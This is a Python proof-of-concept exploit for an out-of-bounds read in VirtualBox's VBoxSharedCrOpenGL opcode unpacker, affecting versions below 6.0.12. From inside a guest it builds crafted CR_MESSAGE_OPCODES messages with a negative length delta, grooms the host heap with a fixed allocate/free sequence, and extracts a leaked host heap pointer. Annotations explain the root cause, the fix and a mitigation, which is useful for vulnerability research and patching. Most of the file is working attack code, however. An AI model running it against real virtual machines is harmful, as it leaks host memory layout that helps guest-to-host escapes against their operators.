# Author : peternguyen93
#
# Proof-of-concept for a heap-address disclosure in VirtualBox's Chromium
# (VBoxSharedCrOpenGL) opcode unpacker. The script builds two crafted
# CR_MESSAGE_OPCODES messages, grooms the host-side heap with a fixed
# allocate/free sequence, and reads a pointer back out of the reply.
# Statement order below is the exploit logic itself (heap layout depends
# on it), so do not reorder the alloc/dispatch calls.
import sys
sys.path.append('../') # back to vboxlib module
# Project-local helpers: hgcm_connect/set_version/alloc_buf/msg_dispatch/
# hgcm_disconnect and the CR_* opcode constants. `pack`/`unpack` are not
# imported explicitly here, so they presumably come through one of these
# star-imports (struct re-exported by vboxlib) — TODO confirm.
from vboxlib.hgcm import *
from vboxlib.chromium import *
from ctypes import *
'''
Affect VirtualBox version < 6.0.12
./VirtualBox/src/VBox/GuestHost/OpenGL/include/cr_unpack.h
---------------------------------------------------------------------
#define INCR_DATA_PTR( delta ) \
cr_unpackData += (delta)
#define INCR_VAR_PTR() \
INCR_DATA_PTR( *((int *) cr_unpackData ) )
---------------------------------------------------------------------
'''
# Root cause (from the macros quoted above): INCR_VAR_PTR() advances the
# unpack cursor by a signed int read from the message data itself, with no
# check that the new cursor stays inside the message buffer. The guest
# supplies that int, so it chooses how far — and in which direction — the
# host-side parser moves. The defensive fix is to validate the delta against
# the remaining buffer length before applying it; the header says versions
# >= 6.0.12 are not affected.

# op2: a GETUNIFORMLOCATION extend-opcode record with a forward delta of
# 0x28 (the record's own size). Used only as filler in tmp_msg below.
op2 = b''
op2+= pack('<I', 0x28) # size opcode (we control)
op2+= pack('<I',CR_GETUNIFORMLOCATION_EXTEND_OPCODE)
op2+= pack('<I', 0x1000) # size (n)
op2+= b'A'*4 # padding
# op1 = pack('<B', CR_EXTEND_OPCODE)
# op1: a GETATTRIBSLOCATIONS extend-opcode record whose length field is
# -0x2050 encoded as an unsigned 32-bit value. Because the macro casts the
# field to `int`, the unpacker sees a negative delta and walks the cursor
# backwards out of the current 0x1000-byte message — into whichever
# neighbouring heap chunk the grooming below has positioned there.
op1 = b''
op1+= pack('<I', c_uint32(-0x2050).value) # size opcode (we control)
op1+= pack('<I', CR_GETATTRIBSLOCATIONS_EXTEND_OPCODE)
op1+= pack('<II', 48, 64)
op1+= b'A'*0x20
# msg: the message that is actually executed (via buf5). Declares two
# opcodes, carries op1, and is padded to one 0x1000-byte chunk.
msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header
msg+= pack('<I', 2) # number of opcode
msg+= b'\x00'*2 # padding
msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE)
msg+= op1
msg = msg.ljust(4096, b'X')
# tmp_msg: the grooming message used for buf1..buf4. Same header layout,
# but declares only one opcode; the trailing op2 copies fill the chunk so
# every allocation is exactly 0x1000 bytes. NOTE(review): with the count
# set to 1 the repeated op2 records may never be dispatched — their role
# looks to be chunk sizing only; confirm against the unpacker.
tmp_msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header
tmp_msg+= pack('<I', 1) # number of opcode
tmp_msg+= b'\x00'*2 # padding
tmp_msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE)
tmp_msg+= op1
tmp_msg+= op2*((4096 - len(tmp_msg)) // len(op2))
tmp_msg = tmp_msg.ljust(4096, b'P')
# Two HGCM clients to the 3D-acceleration service. From the host side this
# is the observable footprint: a guest process opening VBoxSharedCrOpenGL
# sessions; the service is only reachable when 3D acceleration is enabled
# for the VM, so disabling it is the compensating control while unpatched.
client = hgcm_connect('VBoxSharedCrOpenGL')
set_version(client)
client1 = hgcm_connect('VBoxSharedCrOpenGL')
set_version(client1)
# Heap grooming: four same-sized chunks, then free them in an order that
# leaves a hole for buf5 adjacent to freed metadata. alloc_buf/msg_dispatch
# presumably map to HGCM buffer allocation and message submission in
# vboxlib — TODO confirm which call actually frees the host-side chunk.
buf1 = alloc_buf(client, 0x1000, tmp_msg)
buf2 = alloc_buf(client, 0x1000, tmp_msg) # free this
buf3 = alloc_buf(client, 0x1000, tmp_msg) # free this
buf4 = alloc_buf(client, 0x1000, tmp_msg) # msg extend goes here
print('free buf4')
msg_dispatch(client, buf4) # free buf4
print('alloc buf4')
buf5 = alloc_buf(client1, 0x1000, msg) # locale in the last of heap
print('free buf3')
msg_dispatch(client, buf3)
print('free buf2')
msg_dispatch(client, buf2)
# Executing buf5 triggers op1's negative delta; the reply buffer then
# contains whatever the unpacker read from the out-of-bounds location.
print('execute buf5')
res = msg_dispatch(client1, buf5)
print(repr(res)[:64])
# Bytes 8..16 of the reply (just past the 8-byte message header) are
# interpreted as a little-endian 64-bit value — the leaked heap pointer.
heap_address = unpack('<Q', res[8:16])[0]
print('heap:', hex(heap_address))
hgcm_disconnect(client)
hgcm_disconnect(client1)